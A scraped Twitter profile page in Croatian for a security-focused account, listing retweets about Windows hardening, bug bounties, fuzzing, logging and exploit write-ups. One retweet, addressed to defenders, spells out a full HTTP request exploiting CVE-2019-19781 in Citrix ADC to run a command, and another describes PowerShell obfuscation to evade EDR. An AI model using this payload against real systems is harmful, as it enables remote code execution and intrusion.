pwn

@pwn_the_world

Don't follow me !!!

Vrijeme pridruživanja: srpanj 2019.

Tweetovi

Blokirali ste korisnika/cu @pwn_the_world

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @pwn_the_world

  1. proslijedio/la je Tweet
    Odgovor korisniku/ci
    Poništi
  2. proslijedio/la je Tweet
    6. velj

    Hardening Windows isn't conceptually difficult: 1. Patch. 2. Harden Office. 3. Change handlers for risky file types 4. CLM. 5. Use some form of app control/AWL. 6. Block/detect LoLbins. 7. Standard User accounts. 8. Deny inbound traffic not fr. PAWs. 9. Manage admin passwords.

    Prikaži ovu nit
    Poništi
  3. proslijedio/la je Tweet
    5. velj

    This is what I've been working on recently. Together with the hardlink mitigation, they will mitigate >100 vulnerabilities we've received in the past year. Stay tuned.

    Poništi
  4. proslijedio/la je Tweet
    5. velj

    For transparency, here's what my 2019/2020 speaking engagements have offered to cover: Kaspersky SAS: nothing REcon: hotel+flights Blackhat: h+f+honorarium Jailbreak Security: h+f BSides: nothing Bluehat IL: h+f OffensiveCon: h+f+honorarium THOTCON (keynote): h+f+Lyft+honorarium

    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet
    31. sij

    How to make friends at a Hacker Con when you don’t know anyone? Nerd stickers.

    Poništi
  6. proslijedio/la je Tweet
    30. sij

    Some hunters made over €50.000 in bug bounties with this simple trick. 🤑 Thanks for the , !

    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    13. sij

    For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: <target> NSC_USER: ../../../netscaler/portal/templates/si NSC_NONCE: 5 Content-Length: 53 url=a&title=[%+({'BLOCK'='print+`id`'})%]

    Poništi
  8. proslijedio/la je Tweet
    6. velj 2015.

    Give a man an 0day and he'll have access for a day, teach a man to phish and he'll have access for life.

    Poništi
  9. proslijedio/la je Tweet
    28. sij

    [Educational] One of the best blog posts that I ever read about going from 0 to unauth RCE in f**king Mikrotik OS step by step:

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    26. sij

    Memhunter - Live Hunting Of Code Injection Techniques

    Poništi
  11. proslijedio/la je Tweet
    7. svi 2019.
    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    25. sij

    If you're not retaining things like DHCP logs, DNS logs, RDP logs, some kind of internal network monitoring/visibility, you should do that. Trying to hunt through 2 month old traffic is hard when you can't correlate IP to Endpoint because DHCP.

    Poništi
  13. proslijedio/la je Tweet
    23. sij

    New article! Anti-virus Exploitation: Malwarebytes 4.0.4 - Protection Not Found - Hijacking Malwarebytes via COM IPC

    Poništi
  14. proslijedio/la je Tweet
    24. sij

    PoC (DoS) for CVE-2020-0609 & CVE-2020-0610 - RD Gateway RCE

    Poništi
  15. proslijedio/la je Tweet
    22. sij

    progressing through the Hacksys Extreme Vulnerable Driver exploits here: . huge thanks to the sourced authors, feels very silly to write my own blogs on the subject compared to their material/experience,but helps me learn. mb helpful for other noobs like me

    Poništi
  16. proslijedio/la je Tweet
    22. sij

    Finally uploaded video of my talk "Expanding the Reach of Fuzz Testing", which I gave at UMass Amherst! Introduces PerfFuzz, FuzzFactory, FairFuzz, Zest + JQF, RLCheck and Autopandas 😃

    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet
    20. sij

    A write up of PowerShell obfuscation using SecureString: an obfuscation technique that has so far not received the attention it deserves. Your EDR might decode Base64 encoded strings, but will it automatically decode SecureString objects? Probably not. 🟠

    Prikaži ovu nit
    Poništi
  18. proslijedio/la je Tweet
    19. sij

    • Read everyday. • Spend time with nature. • Ask questions. • Never stop learning. • Don't pay attention to what others think of you. • Do what interests you the most. • Study hard. • Teach others what you know. • Make mistakes and learn. • It's Okay to not know things!

    Poništi
  19. proslijedio/la je Tweet
    19. sij
    Poništi
  20. proslijedio/la je Tweet
    18. sij

    - Deep Dive to Citrix ADC Remote Code Execution, CVE-2019-19781 -

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·